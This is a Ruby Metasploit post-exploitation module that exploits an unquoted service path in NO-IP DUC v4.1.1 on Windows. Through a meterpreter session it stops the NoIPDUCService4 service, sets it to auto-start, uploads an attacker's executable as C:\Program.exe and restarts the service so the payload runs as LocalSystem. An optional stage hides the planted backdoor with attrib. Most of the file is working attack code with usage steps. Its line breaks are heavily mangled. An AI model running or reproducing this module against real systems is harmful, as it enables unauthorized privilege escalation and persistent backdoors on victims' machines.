# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
##
##
# Exploit Title : NO-IP_privilege_scalation.rb - 'Unquoted Service Path Privilege Escalation'
# PDF Version : 4.1.1
# vuln Discover : Ehsan Hosseini
# Module Author : pedr0 Ubuntu [r00t-3xp10it]
# Tested on : Windows 7 Professional
# Software Link : http://www.noip.com/client/DUCSetup_v4_1_1.exe
#
#
#
# [ DESCRIPTION ]
# NO-IP DUC v4.1.1 installs a service with an unquoted service path.
# This enables a local privilege escalation vulnerability. To exploit this vulnerability,
# a local attacker can insert an executable file in the path of the service.
# Rebooting the system or restarting the service will run the malicious executable
# with elevated privileges.
#
# ---------------------------------------------------------------------------
# C:\>sc qc NoIPDUCService4
# [SC] QueryServiceConfig SUCCESS
#
# SERVICE_NAME: NoIPDUCService4
# TYPE : 10 WIN32_OWN_PROCESS
# START_TYPE : 2 AUTO_START
# ERROR_CONTROL : 1 NORMAL
# BINARY_PATH_NAME : C:\Program Files\No-IP\ducservice.exe
# LOAD_ORDER_GROUP :
# TAG : 0
# DISPLAY_NAME : NO-IP DUC v4.1.1
# DEPENDENCIES :
# SERVICE_START_NAME : LocalSystem
# ---------------------------------------------------------------------------
# Using the BINARY_PATH_NAME listed above as an example, an executable named
# "Program.exe" could be placed in "C:\", and it would be executed as the
# Local System user next time the service was restarted.
#
#
#
# [ MODULE OPTIONS ]
# Input The session number to run this module on => set SESSION 3
# Input full path of Program.exe to be uploaded => set UPLOAD_PATH /root/Program.exe
# Check pdfcDispatcher service auto-start status? => set SERVICE_STATUS true
# use attrib to hidde your program.exe in target? => set HIDDEN_ATTRIB true
# HINT: to unset all options: msf post(NO-IP_privilege_scalation) > unset all
#
#
#
# [ PORT MODULE TO METASPLOIT DATABASE ]
# Kali linux COPY TO: /usr/share/metasploit-framework/modules/post/windows/escalate/NO-IP_privilege_scalation.rb
# Ubuntu linux COPY TO: /opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/NO-IP_privilege_scalation.rb
# Manually Path Search: root@kali:~# locate modules/post/windows/escalate
#
#
# [ LOAD/USE AUXILIARY ]
# meterpreter > background
# msf exploit(handler) > reload_all
# msf exploit(handler) > use post/windows/escalate/NO-IP_privilege_scalation
# msf post(NO-IP_privilege_scalation) > info
# msf post(NO-IP_privilege_scalation) > show options
# msf post(NO-IP_privilege_scalation) > show advanced options
# msf post(NO-IP_privilege_scalation) > set [option(s)]
# msf post(NO-IP_privilege_scalation) > exploit
##
# ----------------------------
# Module Dependencies/requires
# ----------------------------
require
'rex'
require
'msf/core'
require
'msf/core/post/common'
require
'msf/core/post/windows/priv'
# ----------------------------------
# Metasploit Class name and includes
# ----------------------------------
class
MetasploitModule < Msf::Post
Rank = ExcellentRanking
include Msf::Post::Common
include Msf::Post::Windows::Priv
# -----------------------------------------
# Building Metasploit/Armitage info GUI/CLI
# -----------------------------------------
def
initialize(info={})
super
(update_info(info,
'Name'
=>
'NO-IP_DUC v4.1.1 - Unquoted Service Path Privilege Escalation'
,
'Description'
=> %q{
This post-exploitation
module
requires a meterpreter session to be able to upload/inject our Program.exe into NoIPDUCService4 service.
NO
-
IP_DUC
v4.
1
.
1
installs a service with an unquoted service path. This enables a local privilege escalation vulnerability. To exploit this vulnerability, a local attacker can insert an executable file
in
the path of the service. Rebooting the system
or
restarting the service will run the malicious executable with elevated privileges.
"Warning: payload to be uploaded should be named as: Program.exe"
},
'License'
=>
UNKNOWN_LICENSE
,
'Author'
=>
[
'Vuln discover: Ehsan Hosseini'
,
# vulnerability discover
'Module Author: pedr0 Ubuntu [r00t-3xp10it]'
,
# post-module author
'Special thanks: milton_barra|Chaitanya Haritash'
,
# testing/debug module
],
'Version'
=>
'$Revision: 1.0'
,
'DisclosureDate'
=>
'out 28 2016'
,
'Platform'
=>
'windows'
,
'Arch'
=>
'x86_x64'
,
'Privileged'
=>
'false'
,
'Targets'
=>
[
# Tested againts windows 7 (32 bits) | XP SP1 (32 bits)
[
'Windows XP'
,
'Windows VISTA'
,
'Windows 7'
,
'Windows 8'
,
'Windows 9'
,
'Windows 10'
]
],
'DefaultTarget'
=>
'3'
,
# default its to run againts windows 7 (32 bits)
'References'
=>
[
[
'URL'
,
'goo.gl/ew1IUm'
],
[
'URL'
,
'goo.gl/U54297'
],
],
'DefaultOptions'
=>
{
'SESSION'
=>
'1'
,
# Default its to run againts session 1
},
'SessionTypes'
=> [
'meterpreter'
]
))
register_options(
[
OptString.
new
(
'SESSION'
, [
true
,
'The session number to run this module on'
]),
OptString.
new
(
'UPLOAD_PATH'
, [
false
,
'The full path of Program.exe to be uploaded'
]),
OptBool.
new
(
'SERVICE_STATUS'
, [
false
,
'Check remote NoIPDUCService4 service settings?'
,
false
]),
OptBool.
new
(
'HIDDEN_ATTRIB'
, [
false
,
'Use Attrib command to Hide Program.exe?'
,
false
])
],
self
.
class
)
end
# ----------------------------------------------
# Check for proper target Platform (win32|win64)
# ----------------------------------------------
def
unsupported
session = client
sys = session.sys.config.sysinfo
print_warning(
"[ABORT]: Operative System => #{sys['OS']}"
)
print_error(
"Only windows systems are supported by this module..."
)
print_error(
"Please execute [info] for further information..."
)
print_line(
""
)
raise
Rex::Script::Completed
end
# -----------------------------------------------------------
# UPLOAD OUR EXECUTABLE INTO NoIPDUCService4 BINARY_PATH_NAME
# -----------------------------------------------------------
def
ls_stage1
r=
''
session = client
shell =
"Program.exe"
payload =
"C:\\Program.exe"
upath = datastore[
'UPLOAD_PATH'
]
bin_path =
"C:\\Program Files\\No-IP\\ducservice.exe"
# check for proper config settings enter
# to prevent 'unset all' from deleting default options...
if
datastore[
'UPLOAD_PATH'
] ==
'nil'
print_error(
"Options not configurated correctly..."
)
print_warning(
"Please set UPLOAD_PATH option!"
)
return
nil
else
print_status(
"Deploying backdoor into target system!"
)
sleep(
1
.
0
)
end
# check if vulnerable service (executable) exists
if
client.fs.file.exist?(
"#{bin_path}"
)
print_warning(
"NoIPDUCService4 service:found"
)
sleep(
1
.
0
)
print_good(
"Stoping NoIPDUCService4 service..."
)
# stop service to enable proper configuration
r = session.sys.process.execute(
"cmd.exe /c sc stop NoIPDUCService4"
,
nil
, {
'Hidden'
=>
true
,
'Channelized'
=>
true
})
sleep(
2
.
5
)
print_good(
"Set service to auto-start with windows..."
)
# set service to auto-start with windows
r = session.sys.process.execute(
"cmd.exe /c sc config NoIPDUCService4 start= auto"
,
nil
, {
'Hidden'
=>
true
,
'Channelized'
=>
true
})
sleep(
1
.
0
)
# upload our executable into temp foldder
print_good(
"Uploading payload to target system..."
)
client.fs.file.upload(
"%temp%\\#{shell}"
,
"#{upath}"
)
sleep(
2
.
0
)
# move payload to the rigth directory (unquoted service path)
print_good(
"moving payload to: #{payload}"
)
r = session.sys.process.execute(
"cmd.exe /c move /y %temp%\\#{shell} #{payload}"
,
nil
, {
'Hidden'
=>
true
,
'Channelized'
=>
true
})
sleep(
1
.
0
)
# start remote service ...
print_good(
"Restarting pdfcDispatcher service..."
)
r = session.sys.process.execute(
"cmd.exe /c sc start NoIPDUCService4"
,
nil
, {
'Hidden'
=>
true
,
'Channelized'
=>
true
})
sleep(
2
.
0
)
# task completed successefully...
print_warning(
"NoIPDUCService4 service [binary_path_name] backdoored successefuly!"
)
print_status(
"Setup one handler and Wait everytime that system restarts OR"
)
print_status(
"Setup one handler and restart NoIPDUCService4 service: sc start NoIPDUCService4"
)
print_line(
""
)
else
print_error(
"NoIPDUCService4 service => NOT FOUND..."
)
print_warning(
"Target system does not appear to vulnerable to this"
)
print_warning(
"post-module has aborted all tasks in hands :( "
)
print_line(
""
)
end
# close channel when done
r.channel.close
r.close
# error exception funtion
rescue
::
Exception
=> e
print_error(
"Error: #{e.class} #{e}"
)
end
# -------------------------------------------------
# USE ATTRIB COMMAND TO HIDDE PROGRAM.EXE (PAYLOAD)
# -------------------------------------------------
def
ls_stage2
r=
''
session = client
shell =
"Program.exe"
payload =
"C:\\Program.exe"
# check for proper config settings enter
# to prevent 'unset all' from deleting default options...
if
datastore[
'HIDDEN_ATTRIB'
] ==
'nil'
print_error(
"Options not configurated correctly..."
)
print_warning(
"Please set HIDDEN_ATTRIB option!"
)
return
nil
else
print_status(
"Using Attrib command to hide backdoor!"
)
sleep(
1
.
0
)
end
# check if backdoor.exe exist on target
if
client.fs.file.exist?(
"#{payload}"
)
print_status(
"Backdoor #{shell} file:found"
)
sleep(
1
.
0
)
# change attributes of backdoor to hidde it from site...
r = session.sys.process.execute(
"cmd.exe /c attrib +h +s #{payload}"
,
nil
, {
'Hidden'
=>
true
,
'Channelized'
=>
true
})
print_good(
" Execute => attrib +h +s #{payload}"
)
sleep(
2
.
0
)
# diplay output to user
print_status(
"Our #{shell} its hidden from normal people!"
)
print_status(
"Just dont feed the black hacker within :( "
)
print_warning(
"To revert attributes: attrib -h -s #{payload}"
)
print_line(
""
)
# close channel when done
r.channel.close
r.close
else
print_error(
"#{payload} => NOT FOUND..."
)
print_warning(
"post-module has aborted all tasks in hands :( "
)
print_line(
""
)
end
# error exception funtion
rescue
::
Exception
=> e
print_error(
"Error: #{e.class} #{e}"
)
end
# -------------------------------------------
# CHECK/DISPLAY pdfcDispatcher SERVICE STATUS
# -------------------------------------------
def
ls_stage3
r=
''
session = client
serv=
"NoIPDUCService4"
sysnfo = session.sys.config.sysinfo
# check for proper config settings enter
# to prevent 'unset all' from deleting default options...
if
datastore[
'SERVICE_STATUS'
] ==
'nil'
print_error(
"Options not configurated correctly..."
)
print_warning(
"Please set SERVICE_STATUS option!"
)
return
nil
else
print_status(
"Checking NoIPDUCService4 service settings!"
)
sleep(
1
.
0
)
end
print_warning(
"Reading service hive registry keys..."
)
# search in target regedit for WSearch auto-start service status
# Value:Start - dword: 2 - auto | 3 - manual | 4 - disabled
if
registry_getvaldata(
"HKLM\\System\\CurrentControlSet\\services\\NoIPDUCService4"
,
"Start"
) ==
'2'
startup =
"auto_start"
end
if
registry_getvaldata(
"HKLM\\System\\CurrentControlSet\\services\\NoIPDUCService4"
,
"Start"
) ==
'3'
startup =
"manual_start"
end
if
registry_getvaldata(
"HKLM\\System\\CurrentControlSet\\services\\NoIPDUCService4"
,
"Start"
) ==
'4'
startup =
"disabled_start"
else
startup =
"unknow"
print_error(
"post-module cant define service auto_start status..."
)
print_warning(
"enter into a shell session and execute: sc qc NoIPDUCService4 status"
)
end
sleep(
1
.
0
)
# display pdfcDispatcher service current settings.
print_line(
""
)
print_line(
" :host => #{sysnfo['Computer']}"
)
print_line(
" :service => #{serv}"
)
print_line(
" :status => running"
)
print_line(
" :startup => #{startup}"
)
print_line(
""
)
# error exception funtion
rescue
::
Exception
=> e
print_error(
"Error: #{e.class} #{e}"
)
end
# ------------------------------------------------
# MAIN DISPLAY WINDOWS (ALL MODULES - def run)
# Running sellected modules against session target
# ------------------------------------------------
def
run
session = client
# Check for proper target Platform
unsupported
if
client.platform !~ /win32|win64/i
# Variable declarations (msf API calls)
sysnfo = session.sys.config.sysinfo
runtor = client.sys.config.getuid
runsession = client.session_host
directory = client.fs.dir.pwd
# Print banner and scan results on screen pdfcDispatcher
print_line(
" +----------------------------------------------+"
)
print_line(
" | NO-IP_DUCK - SERVICE PRIVILEGE ESCALATION |"
)
print_line(
" | Author: Pedro Ubuntu [ r00t-3xp10it ] |"
)
print_line(
" +----------------------------------------------+"
)
print_line(
""
)
print_line(
" Running on session : #{datastore['SESSION']}"
)
print_line(
" Computer : #{sysnfo['Computer']}"
)
print_line(
" Operative System : #{sysnfo['OS']}"
)
print_line(
" Target IP addr : #{runsession}"
)
print_line(
" Payload directory : #{directory}"
)
print_line(
" Client UID : #{runtor}"
)
print_line(
""
)
print_line(
""
)
# elevate session privileges befor runing options
client.sys.config.getprivs.
each
do
|priv|
end
# ------------------------------------
# Selected settings to run
# ------------------------------------
if
datastore[
'UPLOAD_PATH'
]
ls_stage1
end
if
datastore[
'HIDDEN_ATTRIB'
]
ls_stage2
end
if
datastore[
'SERVICE_STATUS'
]
ls_stage3
end
end
end